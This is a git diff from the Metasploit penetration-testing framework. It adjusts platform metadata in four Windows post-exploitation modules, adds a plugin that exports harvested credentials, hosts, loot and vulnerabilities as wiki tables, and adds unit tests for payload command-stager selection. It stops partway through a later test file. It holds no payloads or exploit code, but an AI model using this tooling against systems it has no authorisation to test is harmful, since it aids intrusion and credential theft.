diff --git a/modules/post/windows/manage/ie_proxypac.rb b/modules/post/windows/manage/ie_proxypac.rb
index 21bced57ef..bae925eefc 100644
--- a/modules/post/windows/manage/ie_proxypac.rb
+++ b/modules/post/windows/manage/ie_proxypac.rb
@@ -27,7 +27,7 @@ class Metasploit3 < Msf::Post
           [ 'URL', 'https://www.youtube.com/watch?v=YGjIlbBVDqE&hd=1' ],
           [ 'URL', 'http://blog.scriptmonkey.eu/bypassing-group-policy-using-the-windows-registry' ]
         ],
-      'Platform'      => [ 'windows' ],
+      'Platform'      => 'win',
       'SessionTypes'  => [ 'meterpreter' ]
     ))
 
diff --git a/modules/post/windows/manage/portproxy.rb b/modules/post/windows/manage/portproxy.rb
index 385451e7c3..cb45acc1f5 100644
--- a/modules/post/windows/manage/portproxy.rb
+++ b/modules/post/windows/manage/portproxy.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Post
       },
       'License'       => MSF_LICENSE,
       'Author'        => [ 'Borja Merino <bmerinofe[at]gmail.com>'],
-      'Platform'      => [ 'windows' ],
+      'Platform'      => 'win',
       'SessionTypes'  => [ 'meterpreter' ]
     ))
 
diff --git a/modules/post/windows/manage/pptp_tunnel.rb b/modules/post/windows/manage/pptp_tunnel.rb
index 9b370683fd..d6c7b912ab 100644
--- a/modules/post/windows/manage/pptp_tunnel.rb
+++ b/modules/post/windows/manage/pptp_tunnel.rb
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Post
         [
           [ 'URL', 'http://www.youtube.com/watch?v=vdppEZjMPCM&hd=1' ]
         ],
-      'Platform'      => 'windows',
+      'Platform'      => 'win',
       'SessionTypes'  => [ 'meterpreter' ]
     ))
 
diff --git a/modules/post/windows/manage/rpcapd_start.rb b/modules/post/windows/manage/rpcapd_start.rb
index df88e5b8b1..c1625ab5ee 100644
--- a/modules/post/windows/manage/rpcapd_start.rb
+++ b/modules/post/windows/manage/rpcapd_start.rb
@@ -23,7 +23,7 @@ class Metasploit3 < Msf::Post
         PORT will be used depending of the mode configured.},
       'License'       => MSF_LICENSE,
       'Author'        => [ 'Borja Merino <bmerinofe[at]gmail.com>'],
-      'Platform'      => [ 'windows' ],
+      'Platform'      => 'win',
       'SessionTypes'  => [ 'meterpreter' ]
     ))
 
diff --git a/plugins/wiki.rb b/plugins/wiki.rb
new file mode 100644
index 0000000000..466609edd1
--- /dev/null
+++ b/plugins/wiki.rb
@@ -0,0 +1,574 @@
+##
+#
+# This plugin requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+#
+##
+
+module Msf
+
+###
+#
+# This plugin extends the Rex::Ui::Text::Table class and provides commands
+# that output database information for the current workspace in a wiki
+# friendly format
+#
+# @author Trenton Ivey
+#  * *email:* ("trenton.ivey@example.com").gsub(/example/,"gmail")
+#  * *github:* kn0
+#  * *twitter:* trentonivey
+###
+class Plugin::Wiki < Msf::Plugin
+
+  ###
+  #
+  # This class implements a command dispatcher that provides commands to
+  # output database information in a wiki friendly format.
+  #
+  ###
+  class WikiCommandDispatcher
+    include Msf::Ui::Console::CommandDispatcher
+
+    #
+    # The dispatcher's name.
+    #
+    def name
+      "Wiki"
+    end
+
+    #
+    # Returns the hash of commands supported by the wiki dispatcher.
+    #
+    def commands
+      {
+        "dokuwiki" => "Outputs data from the current workspace in dokuwiki markup.",
+        "mediawiki" => "Outputs data from the current workspace in mediawiki markup."
+      }
+    end
+
+    #
+    # Outputs database entries as Dokuwiki formatted text by passing the
+    # arguments to the wiki method with a wiki_type of 'dokuwiki'
+    # @param [Array<String>] args the arguments passed when the command is
+    #   called
+    # @see #wiki
+    #
+    def cmd_dokuwiki(*args)
+      wiki("dokuwiki", *args)
+    end
+
+    #
+    # Outputs database entries as Mediawiki formatted text by passing the
+    # arguments to the wiki method with a wiki_type of 'mediawiki'
+    # @param [Array<String>] args the arguments passed when the command is
+    #   called
+    # @see #wiki
+    #
+    def cmd_mediawiki(*args)
+      wiki("mediawiki", *args)
+    end
+
+    #
+    # This method parses arguments passed from the wiki output commands
+    # and then formats and displays or saves text according to the
+    # provided wiki type
+    #
+    # @param [String] wiki_type selects the wiki markup lanuguage output to
+    #   use, it can be:
+    #   * dokuwiki
+    #   * mediawiki
+    #
+    # @param [Array<String>] args the arguments passed when the command is
+    #  called
+    #
+    def wiki(wiki_type, *args)
+      # Create a table options hash
+      tbl_opts = {}
+      # Set some default options for the table hash
+      tbl_opts[:hosts] = []
+      tbl_opts[:links] = false
+      tbl_opts[:wiki_type] = wiki_type
+      tbl_opts[:heading_size] = 5
+      case wiki_type
+      when "dokuwiki"
+        tbl_opts[:namespace] = 'notes:targets:hosts:'
+      else
+        tbl_opts[:namespace] = ''
+      end
+
+      # Get the table we should be looking at
+      command = args.shift
+      if command.nil? or not(["creds","hosts","loot","services","vulns"].include?(command.downcase))
+        usage(wiki_type)
+        return
+      end
+
+      # Parse the rest of the arguments
+      while (arg = args.shift)
+        case arg
+        when '-o','--output'
+          tbl_opts[:file_name] = next_opt(args)
+        when '-h','--help'
+          usage(wiki_type)
+          return
+        when '-l', '-L', '--link', '--links'
+          tbl_opts[:links] = true
+        when '-n', '-N', '--namespace'
+          tbl_opts[:namespace] = next_opt(args)
+        when '-p', '-P', '--port', '--ports'
+          tbl_opts[:ports] = next_opts(args)
+          tbl_opts[:ports].map! {|p| p.to_i}
+        when '-s', '-S', '--search'
+          tbl_opts[:search] = next_opt(args)
+        when '-i', '-I', '--heading-size'
+          heading_size = next_opt(args)
+          tbl_opts[:heading_size] = heading_size.to_i unless heading_size.nil?
+        else
+          # Assume it is a host
+          rw = Rex::Socket::RangeWalker.new(arg)
+          if rw.valid?
+            rw.each do |ip|
+              tbl_opts[:hosts] << ip
+            end
+          else
+            print_warning "#{arg} is an invalid hostname"
+          end
+        end
+      end
+
+      # Create an Array to hold a list of tables that we want to show
+      outputs = []
+
+      # Output the table
+      if respond_to? "#{command}_to_table"
+        table = send "#{command}_to_table", tbl_opts
+        if table.respond_to? "to_#{wiki_type}"
+          if tbl_opts[:file_name]
+            print_status("Wrote the #{command} table to a file as a #{wiki_type} formatted table")
+            File.open(tbl_opts[:file_name],"wb") {|f|
+              f.write(table.send  "to_#{wiki_type}")
+            }
+          else
+            print_line table.send  "to_#{wiki_type}"
+          end
+          return
+        end
+      end
+      usage(wiki_type)
+    end
+
+    #
+    # Gets the next set of arguments when parsing command options
+    #
+    # *Note:* This will modify the provided argument list
+    #
+    # @param [Array] args the list of unparsed arguments
+    # @return [Array] the unique list of items before the next '-' in the
+    #   provided array
+    #
+    def next_opts(args)
+      opts = []
+      while ( opt = args.shift )
+        if opt =~ /^-/
+          args.unshift opt
+          break
+        end
+        opts.concat ( opt.split(',') )
+      end
+      return opts.uniq
+    end
+
+    #
+    # Gets the next argument when parsing command options
+    #
+    # *Note:* This will modify the provided argument list
+    #
+    # @param [Array] args the list of unparsed arguments
+    # @return [String, nil] the argument or nil if the argument starts with a '-'
+    #
+    def next_opt(args)
+      return nil if args[0] =~ /^-/
+      args.shift
+    end
+
+    #
+    # Outputs the help message
+    #
+    # @param [String] cmd_name the type of the wiki output command to display
+    #   help for
+    #
+    def usage(cmd_name = "<wiki cmd>")
+      print_line "Usage: #{cmd_name} <table> [options] [IP1 IP2,IPn]"
+      print_line
+      print_line "The first argument must be the type of table to retrieve:"
+      print_line "  creds, hosts, loot, services, vulns"
+      print_line
+      print_line "OPTIONS:"
+      print_line "  -l,--link                Enables links for host addresses"
+      print_line "  -n,--namespace <ns>      Changes the default namespace for host links"
+      print_line "  -o,--output <file>       Write output to a file"
+      print_line "  -p,--port <ports>        Only return results that relate to given ports"
+      print_line "  -s,--search <search>     Only show results that match the provided text"
+      print_line "  -i,--heading-size <1-6>  Changes the heading size"
+      print_line "  -h,--help                Displays this menu"
+      print_line
+    end
+
+    #
+    # Outputs credentials in the database (within the current workspace) as a Rex table object
+    # @param [Hash] opts
+    # @option opts [Array<String>] :hosts contains list of hosts used to limit results
+    # @option opts [Array<Fixnum>] :ports contains list of ports used to limit results
+    # @option opts [String] :search limits results to those containing a provided string
+    # @return [Rex::Ui::Text::Table] table containing credentials
+    #
+    def creds_to_table(opts = {})
+      tbl = Rex::Ui::Text::Table.new({'Columns' => ['host','port','user','pass','type','proof','active?']})
+      tbl.header = 'Credentials'
+      tbl.headeri = opts[:heading_size]
+      framework.db.creds.each do |cred|
+        unless opts[:hosts].nil? or opts[:hosts].empty?
+          next unless opts[:hosts].include? cred.service.host.address
+        end
+        unless opts[:ports].nil?
+          next unless opts[:ports].any? {|p| cred.service.port.eql? p}
+        end
+        address = cred.service.host.address
+        address = to_wikilink(address,opts[:namespace]) if opts[:links]
+        row = [
+          address,
+          cred.service.port,
+          cred.user,
+          cred.pass,
+          cred.ptype,
+          cred.proof,
+          cred.active
+        ]
+        if opts[:search]
+          tbl << row if row.any? {|r| /#{opts[:search]}/i.match r.to_s}
+        else
+          tbl << row
+        end
+      end
+      return tbl
+    end
+
+    #
+    # Outputs host information stored in the database (within the current
+    #   workspace) as a Rex table object
+    # @param [Hash] opts
+    # @option opts [Array<String>] :hosts contains list of hosts used to limit results
+    # @option opts [Array<String>] :ports contains list of ports used to limit results
+    # @option opts [String] :search limits results to those containing a provided string
+    # @return [Rex::Ui::Text::Table] table containing credentials
+    #
+    def hosts_to_table(opts = {})
+      tbl = Rex::Ui::Text::Table.new({'Columns' => ['address','mac','name','os_name','os_flavor','os_sp','purpose','info','comments']})
+      tbl.header = 'Hosts'
+      tbl.headeri = opts[:heading_size]
+      framework.db.hosts.each do |host|
+        unless opts[:hosts].nil? or opts[:hosts].empty?
+          next unless opts[:hosts].include? host.address
+        end
+        unless opts[:ports].nil?
+          next unless (host.services.map{|s| s[:port]}).any? {|p| opts[:ports].include? p}
+        end
+        address = host.address
+        address = to_wikilink(address,opts[:namespace]) if opts[:links]
+        row = [
+          address,
+          host.mac,
+          host.name,
+          host.os_name,
+          host.os_flavor,
+          host.os_sp,
+          host.purpose,
+          host.info,
+          host.comments
+        ]
+        if opts[:search]
+          tbl << row if row.any? {|r| /#{opts[:search]}/i.match r.to_s}
+        else
+          tbl << row
+        end
+      end
+      return tbl
+    end
+
+    #
+    # Outputs loot information stored in the database (within the current
+    #   workspace) as a Rex table object
+    # @param [Hash] opts
+    # @option opts [Array<String>] :hosts contains list of hosts used to limit results
+    # @option opts [Array<String>] :ports contains list of ports used to limit results
+    # @option opts [String] :search limits results to those containing a provided string
+    # @return [Rex::Ui::Text::Table] table containing credentials
+    #
+    def loot_to_table(opts = {})
+      tbl = Rex::Ui::Text::Table.new({'Columns' => ['host','service','type','name','content','info','path']})
+      tbl.header = 'Loot'
+      tbl.headeri = opts[:heading_size]
+      framework.db.loots.each do |loot|
+        unless opts[:hosts].nil? or opts[:hosts].empty?
+          next unless opts[:hosts].include? loot.host.address
+        end
+        unless opts[:ports].nil? or opts[:ports].empty?
+          next if loot.service.nil? or loot.service.port.nil? or not opts[:ports].include? loot.service.port
+        end
+        if loot.service
+          svc = (loot.service.name ? loot.service.name : "#{loot.service.port}/#{loot.service.proto}")
+        end
+        address = loot.host.address
+        address = to_wikilink(address,opts[:namespace]) if opts[:links]
+        row = [
+          address,
+          svc || "",
+          loot.ltype,
+          loot.name,
+          loot.content_type,
+          loot.info,
+          loot.path
+        ]
+        if opts[:search]
+          tbl << row if row.any? {|r| /#{opts[:search]}/i.match r.to_s}
+        else
+          tbl << row
+        end
+      end
+      return tbl
+    end
+
+    #
+    # Outputs service information stored in the database (within the current
+    # workspace) as a Rex table object
+    # @param [Hash] opts
+    # @option opts [Array<String>] :hosts contains list of hosts used to limit results
+    # @option opts [Array<String>] :ports contains list of ports used to limit results
+    # @option opts [String] :search limits results to those containing a provided string
+    # @return [Rex::Ui::Text::Table] table containing credentials
+    #
+    def services_to_table(opts = {})
+      tbl = Rex::Ui::Text::Table.new({'Columns' => ['host','port','proto','name','state','info']})
+      tbl.header = 'Services'
+      tbl.headeri = opts[:heading_size]
+      framework.db.services.each do |service|
+        unless opts[:hosts].nil? or opts[:hosts].empty?
+          next unless opts[:hosts].include? service.host.address
+        end
+        unless opts[:ports].nil? or opts[:ports].empty?
+          next unless opts[:ports].any? {|p| service[:port].eql? p}
+        end
+        address = service.host.address
+        address = to_wikilink(address,opts[:namespace]) if opts[:links]
+        row = [
+          address,
+          service.port,
+          service.proto,
+          service.name,
+          service.state,
+          service.info
+        ]
+        if opts[:search]
+          tbl << row if row.any? {|r| /#{opts[:search]}/i.match r.to_s}
+        else
+          tbl << row
+        end
+      end
+      return tbl
+    end
+
+    #
+    # Outputs vulnerability information stored in the database (within the current
+    # workspace) as a Rex table object
+    # @param [Hash] opts
+    # @option opts [Array<String>] :hosts contains list of hosts used to limit results
+    # @option opts [Array<String>] :ports contains list of ports used to limit results
+    # @option opts [String] :search limits results to those containing a provided string
+    # @return [Rex::Ui::Text::Table] table containing credentials
+    #
+    def vulns_to_table(opts = {})
+      tbl = Rex::Ui::Text::Table.new({'Columns' => ['Title','Host','Port','Info','Detail Count','Attempt Count','Exploited At','Updated At']})
+      tbl.header = 'Vulns'
+      tbl.headeri = opts[:heading_size]
+      framework.db.vulns.each do |vuln|
+        unless opts[:hosts].nil? or opts[:hosts].empty?
+          next unless opts[:hosts].include? vuln.host.address
+        end
+        unless opts[:ports].nil? or opts[:ports].empty?
+          next unless opts[:ports].any? {|p| vuln.service.port.eql? p}
+        end
+        address = vuln.host.address
+        address = to_wikilink(address,opts[:namespace]) if opts[:links]
+        row = [
+          vuln.name,
+          address,
+          (vuln.service ? vuln.service.port : ""),
+          vuln.info,
+          vuln.vuln_detail_count,
+          vuln.vuln_attempt_count,
+          vuln.exploited_at,
+          vuln.updated_at,
+        ]
+        if opts[:search]
+          tbl << row if row.any? {|r| /#{opts[:search]}/i.match r.to_s}
+        else
+          tbl << row
+        end
+      end
+      return tbl
+    end
+
+    #
+    # Converts a value to a wiki link
+    # @param [String] text value to convert to a link
+    # @param [String] namespace optional namespace to set for the link
+    # @return [String] the formated wiki link
+    def to_wikilink(text,namespace = "")
+      return "[[" + namespace + text + "]]"
+    end
+
+  end
+
+
+  #
+  # Plugin Initialization
+  #
+
+
+  #
+  # Constructs a new instance of the plugin and registers the console
+  # dispatcher. It also extends Rex by adding the following methods:
+  #   * Rex::Ui::Text::Table.to_dokuwiki
+  #   * Rex::Ui::Text::Table.to_mediawiki
+  #
+  def initialize(framework, opts)
+    super
+
+    # Extend Rex::Ui::Text::Table class so it can output wiki formats
+    add_dokuwiki_to_rex
+    add_mediawiki_to_rex
+
+    # Add the console dispatcher
+    add_console_dispatcher(WikiCommandDispatcher)
+  end
+
+  #
+  # The cleanup routine removes the methods added to Rex by the plugin
+  # initialization and then removes the console dispatcher
+  #
+  def cleanup
+    # Cleanup methods added to Rex::Ui::Text::Table
+    Rex::Ui::Text::Table.class_eval { undef :to_dokuwiki }
+    Rex::Ui::Text::Table.class_eval { undef :to_mediawiki }
+    # Deregister the console dispatcher
+    remove_console_dispatcher('Wiki')
+  end
+
+  #
+  # Returns the plugin's name.
+  #
+  def name
+    "wiki"
+  end
+
+  #
+  # This method returns a brief description of the plugin.  It should be no
+  # more than 60 characters, but there are no hard limits.
+  #
+  def desc
+    "Adds output to wikitext"
+  end
+
+
+  #
+  # The following methods are added here to keep the initialize method
+  # readable
+  #
+
+
+  #
+  # Extends Rex tables to be able to create Dokuwiki tables
+  #
+  def add_dokuwiki_to_rex
+    Rex::Ui::Text::Table.class_eval do
+      def to_dokuwiki
+        str = prefix.dup
+        # Print the header if there is one. Use headeri to determine wiki paragraph level
+        if header
+          level = "=" * headeri
+          str << level + header + level + "\n"
+        end
+        # Add the column names to the top of the table
+        columns.each do |col|
+          str << "^ " + col.to_s + " "
+        end
+        str << "^\n" unless columns.count.eql? 0
+        # Fill out the rest of the table with rows
+        rows.each do |row|
+          row.each do |val|
+            cell = val.to_s
+            cell = "<nowiki>#{cell}</nowiki>" if cell.include? "|"
+            str << "| " + cell + " "
+          end
+          str << "|\n" unless rows.count.eql? 0
+        end
+        return str
+      end
+    end
+  end
+
+  #
+  # Extends Rex tables to be able to create Mediawiki tables
+  #
+  def add_mediawiki_to_rex
+    Rex::Ui::Text::Table.class_eval do
+      def to_mediawiki
+        str = prefix.dup
+        # Print the header if there is one. Use headeri to determine wiki
+        # headline level. Mediawiki does headlines a bit backwards so that
+        # the header level isn't limited. This results in the need to 'flip'
+        # the headline length to standardize it.
+        if header
+          if headeri <= 6
+            level = "=" * (-headeri + 7)
+            str << "#{level} #{header} #{level}"
+           else
+             str << "#{header}"
+          end
+          str << "\n"
+        end
+        # Setup the table with some standard formatting options
+        str << "{|class=\"wikitable\"\n"
+        # Output formated column names as the first row
+        unless columns.count.eql? 0
+          str << "!"
+          str << columns.join("!!")
+          str << "\n"
+        end
+        # Add the rows to the table
+        unless rows.count.eql? 0
+          rows.each do |row|
+            str << "|-\n|"
+            # Try and prevent formatting tags from causing problems
+            bad = ['&','<','>','"',"'",'/']
+            r = row.join("|| ")
+            r.each_char do |c|
+              if bad.include? c
+                str << Rex::Text.html_encode(c)
+              else
+                str << c
+              end
+            end
+            str << "\n"
+          end
+        end
+        # Finish up the table
+        str << "|}"
+        return str
+      end
+    end
+  end
+
+protected
+end
+end
diff --git a/spec/lib/msf/core/exploit/cmdstager_spec.rb b/spec/lib/msf/core/exploit/cmdstager_spec.rb
new file mode 100644
index 0000000000..b6e444a24a
--- /dev/null
+++ b/spec/lib/msf/core/exploit/cmdstager_spec.rb
@@ -0,0 +1,698 @@
+require 'spec_helper'
+
+require 'msf/core'
+require 'msf/core/exploit/cmdstager'
+
+describe Msf::Exploit::CmdStager do
+
+  def create_exploit(info ={})
+    mod = Msf::Exploit.allocate
+    mod.extend described_class
+    mod.send(:initialize, info)
+    mod
+  end
+
+  describe "#select_cmdstager" do
+
+    subject do
+      create_exploit
+    end
+
+    context "when no flavor" do
+
+      it "raises ArgumentError" do
+        expect { subject.select_cmdstager }.to raise_error(ArgumentError, /Unable to select CMD Stager/)
+      end
+    end
+
+    context "when correct flavor" do
+
+      context "with default decoder" do
+
+        let(:flavor) do
+          :vbs
+        end
+
+        before do
+          subject.select_cmdstager(:flavor => flavor)
+        end
+
+        it "selects flavor" do
+          expect(subject.flavor).to eq(flavor)
+        end
+
+        it "selects default decoder" do
+          expect(subject.decoder).to eq(subject.default_decoder(flavor))
+        end
+      end
+
+      context "without default decoder" do
+
+        let(:flavor) do
+          :tftp
+        end
+
+        before do
+          subject.select_cmdstager(:flavor => flavor)
+        end
+
+        it "selects flavor" do
+          expect(subject.flavor).to eq(flavor)
+        end
+
+        it "hasn't decoder" do
+          expect(subject.decoder).to be_nil
+        end
+      end
+
+      context "with incompatible target" do
+
+        subject do
+          create_exploit({
+            'DefaultTarget' => 0,
+            'Targets' =>
+              [
+                ['Linux',
+                  {
+                    'Platform' => 'linux',
+                    'CmdStagerFlavor' => 'tftp'
+                  }
+                ]
+              ]
+          })
+        end
+
+        let(:flavor) do
+          :vbs
+        end
+
+        it "raises ArgumentError" do
+          expect { subject.select_cmdstager(:flavor => flavor) }.to raise_error(ArgumentError, /The CMD Stager '\w+' isn't compatible with the target/)
+        end
+      end
+    end
+  end
+
+  describe "#default_decoder" do
+
+    subject do
+      create_exploit
+    end
+
+    context "when valid flavor as input" do
+
+      context "with default decoder" do
+        let(:flavor) do
+          :vbs
+        end
+
+        let(:expected_decoder) do
+          described_class::DECODERS[:vbs]
+        end
+
+        it "returns the decoder path" do
+          expect(subject.default_decoder(flavor)).to eq(expected_decoder)
+        end
+      end
+
+      context "without default decoder" do
+        let(:flavor) do
+          :bourne
+        end
+
+        it "returns nil" do
+          expect(subject.default_decoder(flavor)).to be_nil
+        end
+      end
+    end
+
+    context "when invalid flavor as input" do
+      let(:flavor) do
+        :invalid_flavor
+      end
+
+      it "returns nil" do
+        expect(subject.default_decoder(flavor)).to be_nil
+      end
+    end
+
+    context "when nil flavor as input" do
+      let(:flavor) do
+        nil
+      end
+
+      it "should be nil" do
+        expect(subject.default_decoder(flavor)).to be_nil
+      end
+    end
+  end
+
+  describe "#module_flavors" do
+
+    context "when the module hasn't CmdStagerFlavor info" do
+
+      context "neither the target" do
+
+        subject do
+          create_exploit
+        end
+
+        it "returns empty array" do
+          expect(subject.module_flavors).to eq([])
+        end
+      end
+
+      context "the target has CmdStagerFlavor info" do
+
+        subject do
+          create_exploit({
+            'DefaultTarget' => 0,
+            'Targets' =>
+              [
+                ['Windows',
+                  {
+                    'CmdStagerFlavor' => 'vbs'
+                  }
+                ]
+              ]
+          })
+        end
+
+        let(:expected_flavor) do
+          ['vbs']
+        end
+
+        it "returns an array with the target flavor" do
+          expect(subject.module_flavors).to eq(expected_flavor)
+        end
+      end
+    end
+
+    context "when the module has CmdStagerFlavor info" do
+
+      context "but the target hasn't CmdStagerFlavor info" do
+
+        subject do
+          create_exploit('CmdStagerFlavor' => 'vbs')
+        end
+
+        let(:expected_flavor) do
+          ['vbs']
+        end
+
+        it "returns an array with the module flavor" do
+          expect(subject.module_flavors).to eq(expected_flavor)
+        end
+      end
+
+      context "and the target has CmdStagerFlavor info" do
+
+        subject do
+          create_exploit({
+            'CmdStagerFlavor' => 'vbs',
+            'DefaultTarget'   => 0,
+            'Targets' =>
+              [
+                ['Windows TFTP',
+                  {
+                    'CmdStagerFlavor' => 'tftp'
+                  }
+                ]
+              ]
+          })
+        end
+
+        let(:expected_flavor) do
+          ['vbs', 'tftp']
+        end
+
+        it "returns an array with all the flavors available to the module" do
+          expect(subject.module_flavors).to eq(expected_flavor)
+        end
+      end
+    end
+  end
+
+  describe "#target_flavor" do
+
+    context "when the module hasn't CmdStagerFlavor info" do
+
+      context "neither the target" do
+
+        subject do
+          create_exploit
+        end
+
+        it "returns nil" do
+          expect(subject.target_flavor).to be_nil
+        end
+      end
+
+      context "the target has CmdStagerFlavor info" do
+
+        subject do
+          create_exploit({
+            'DefaultTarget' => 0,
+            'Targets' =>
+              [
+                ['Windows',
+                  {
+                    'CmdStagerFlavor' => 'vbs'
+                  }
+                ]
+              ]
+          })
+        end
+
+        let(:expected_flavor) do
+          'vbs'
+        end
+
+        it "returns the target flavor" do
+          expect(subject.target_flavor).to eq(expected_flavor)
+        end
+      end
+    end
+
+    context "when the module has CmdStagerFlavor info" do
+
+      context "but the target hasn't CmdStagerFlavor info" do
+
+        subject do
+          create_exploit('CmdStagerFlavor' => 'vbs')
+        end
+
+        let(:expected_flavor) do
+          'vbs'
+        end
+
+        it "returns the module flavor" do
+          expect(subject.target_flavor).to eq(expected_flavor)
+        end
+      end
+
+      context "and the target has CmdStagerFlavor info" do
+
+        subject do
+          create_exploit({
+            'CmdStagerFlavor' => 'vbs',
+            'DefaultTarget'   => 0,
+            'Targets' =>
+              [
+                ['Windows TFTP',
+                  {
+                    'CmdStagerFlavor' => 'tftp'
+                  }
+                ]
+              ]
+          })
+        end
+
+        let(:expected_flavor) do
+          'tftp'
+        end
+
+        it "returns the target flavor" do
+          expect(subject.target_flavor).to eq(expected_flavor)
+        end
+      end
+    end
+  end
+
+  describe "#compatible_flavor?" do
+
+    context "when there isn't target flavor" do
+
+      subject do
+        create_exploit
+      end
+
+      let(:flavor) do
+        :vbs
+      end
+
+      it "is compatible" do
+        expect(subject.compatible_flavor?(flavor)).to be_true
+      end
+    end
+
+    context "when the target flavor is a string" do
+
+      subject do
+        create_exploit('CmdStagerFlavor' => 'vbs')
+      end
+
+      context "and good flavor" do
+        let(:flavor) do
+          :vbs
+        end
+
+        it "is compatible" do
+          expect(subject.compatible_flavor?(flavor)).to be_true
+        end
+      end
+
+      context "and bad flavor" do
+        let(:flavor) do
+          :tftp
+        end
+
+        it "isn't compatible" do
+          expect(subject.compatible_flavor?(flavor)).to be_false
+        end
+      end
+    end
+
+    context "when the target flavor is a symbol" do
+
+      subject do
+        create_exploit('CmdStagerFlavor' => :vbs)
+      end
+
+      context "and good flavor" do
+        let(:flavor) do
+          :vbs
+        end
+
+        it "is compatible" do
+          expect(subject.compatible_flavor?(flavor)).to be_true
+        end
+      end
+
+      context "and bad flavor" do
+        let(:flavor) do
+          :tftp
+        end
+
+        it "isn't compatible" do
+          expect(subject.compatible_flavor?(flavor)).to be_false
+        end
+      end
+    end
+
+    context "when the target flavor is an Array" do
+
+      subject do
+        create_exploit('CmdStagerFlavor' => ['vbs', :tftp])
+      end
+
+      context "and good flavor" do
+        let(:flavor) do
+          :vbs
+        end
+
+        it "is compatible" do
+          expect(subject.compatible_flavor?(flavor)).to be_true
+        end
+      end
+
+      context "and bad flavor" do
+        let(:flavor) do
+          :echo
+        end
+
+        it "isn't compatible" do
+          expect(subject.compatible_flavor?(flavor)).to be_false
+        end
+      end
+
+    end
+  end
+
+  describe "#guess_flavor" do
+
+    context "when the module hasn't targets" do
+
+      context "neither platforms" do
+        subject do
+          create_exploit
+        end
+
+        it "doesn't guess" do
+          expect(subject.guess_flavor).to be_nil
+        end
+      end
+
+      context "but platforms" do
+
+        context "one platform with default flavor" do
+          let(:platform) do
+            'win'
+          end
+
+          let(:expected_flavor) do
+            :vbs
+          end
+
+          subject do
+            create_exploit('Platform' => platform)
+          end
+
+          it "guess the platform defulat flavor" do
+            expect(subject.guess_flavor).to eq(expected_flavor)
+          end
+        end
+
+        context "one platform without default flavor" do
+          let (:platform) do
+            'java'
+          end
+
+          subject do
+            create_exploit('Platform' => platform)
+          end
+
+          it "doesn't guess" do
+            expect(subject.guess_flavor).to be_nil
+          end
+        end
+
+        context "two platforms" do
+          let(:platform) do
+            ['unix', 'linux']
+          end
+
+          subject do
+            create_exploit('Platform' => platform)
+          end
+
+          it "doesn't guess" do
+            expect(subject.guess_flavor).to be_nil
+          end
+        end
+      end
+    end
+
+    context "when the module has one target" do
+
+      context "and the target has one platform" do
+
+        context "with default flavor"do
+          let (:expected_flavor) do
+            :vbs
+          end
+
+          let (:platform) do
+            'win'
+          end
+
+          subject do
+            create_exploit({
+              'DefaultTarget' => 0,
+              'Targets' =>
+                [
+                  ['Windows',
+                    {
+                      'Platform' => platform
+                    }
+                  ]
+                ]
+            })
+          end
+
+          it "guess the target flavor" do
+            expect(subject.guess_flavor).to eq(expected_flavor)
+          end
+
+        end
+
+        context "without default flavor" do
+          let (:platform) do
+            'java'
+          end
+
+          subject do
+            create_exploit({
+              'DefaultTarget' => 0,
+              'Targets' =>
+                [
+                  ['Java',
+                    {
+                      'Platform' => platform
+                    }
+                  ]
+                ]
+            })
+          end
+
+          it "doesn't guess" do
+            expect(subject.guess_flavor).to be_nil
+          end
+        end
+      end
+
+      context "the target has two platforms" do
+        subject do
+          create_exploit({
+            'DefaultTarget' => 0,
+            'Targets' =>
+              [
+                ['MultiPlatform',
+                  {
+                    'Platform' => %w{ linux unix}
+                  }
+                ]
+              ]
+          })
+        end
+
+        it "doesn't guess" do
+          expect(subject.guess_flavor).to be_nil
+        end
+      end
+    end
+  end
+
+  describe "#select_flavor" do
+
+    context "when flavor set in the datastore" do
+
+      subject do
+        create_exploit({
+          'DefaultOptions' => {
+            'CMDSTAGER::FLAVOR' => 'vbs'
+          }
+        })
+      end
+
+      let(:datastore_flavor) do
+        :vbs
+      end
+
+      it "returns the datastore flavor" do
+        expect(subject.select_flavor).to eq(datastore_flavor)
+      end
+
+      context "and flavor set in the opts" do
+
+        let(:opts_flavor) do
+          :bourne
+        end
+
+        it "returns the opts flavor" do
+          expect(subject.select_flavor(:flavor => :bourne)).to eq(opts_flavor)
+        end
+      end
+    end
+  end
+
+  describe "#select_decoder" do
+
+    context "when decoder set in the datastore" do
+
+      let(:decoder) do
+        File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64")
+      end
+
+      subject do
+        create_exploit({
+          'DefaultOptions' => {
+            'CMDSTAGER::DECODER' => decoder
+          }
+        })
+      end
+
+      it "returns datastore flavor" do
+        expect(subject.select_decoder).to eq(decoder)
+      end
+
+      context "and decoder set in the opts" do
+
+        let(:decoder_opts) do
+          File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64_adodb")
+        end
+
+        it "returns the decoder_opts" do
+          expect(subject.select_decoder(:decoder => decoder_opts)).to eq(decoder_opts)
+        end
+      end
+    end
+  end
+
+  describe "#opts_with_decoder" do
+    subject do
+      create_exploit
+    end
+
+    context "with :decoder option" do
+
+      let(:decoder) do
+        File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64")
+      end
+
+      it "returns the :decoder option" do
+        expect(subject.opts_with_decoder(:decoder => decoder)).to include(:decoder)
+      end
+    end
+
+    context "without decoder option" do
+      it ":hasn't decoder option" do
+        expect(subject.opts_with_decoder).not_to include(:decoder)
+      end
+    end
+
+  end
+
+  describe "#create_stager" do
+    subject do
+      create_exploit
+    end
+
+    context "with correct flavor" do
+
+      let(:flavor) do
+        :vbs
+      end
+
+      let(:expected_class) do
+        described_class::STAGERS[flavor]
+      end
+
+      before do
+        subject.flavor = flavor
+      end
+
+      it "creates the correct instance" do
+        expect(subject.create_stager.class).to eq(expected_class)
+      end
+    end
+
+    context "with incorrect flavor" do
+      let(:flavor) do
+        :incorrect_flavor
+      end
+
+      let(:expected_class) do
+        described_class::STAGERS[flavor]
+      end
+
+      before do
+        subject.flavor = flavor
+      end
+
+      it "raises a NoMethodError" do
+        expect { subject.create_stager }.to raise_error(NoMethodError)
+      end
+    end
+  end
+end
diff --git a/spec/lib/msf/core/framework_spec.rb b/spec/lib/msf/core/framework_spec.rb
index c6eadf591b..7c96718f7d 100644
--- a/spec/lib/msf/core/framework_spec.rb
+++ b/spec/lib/msf/core/framework_spec.rb
@@ -6,7 +6,7 @@ require 'msf/core/framework'
 describe Msf::Framework do
 
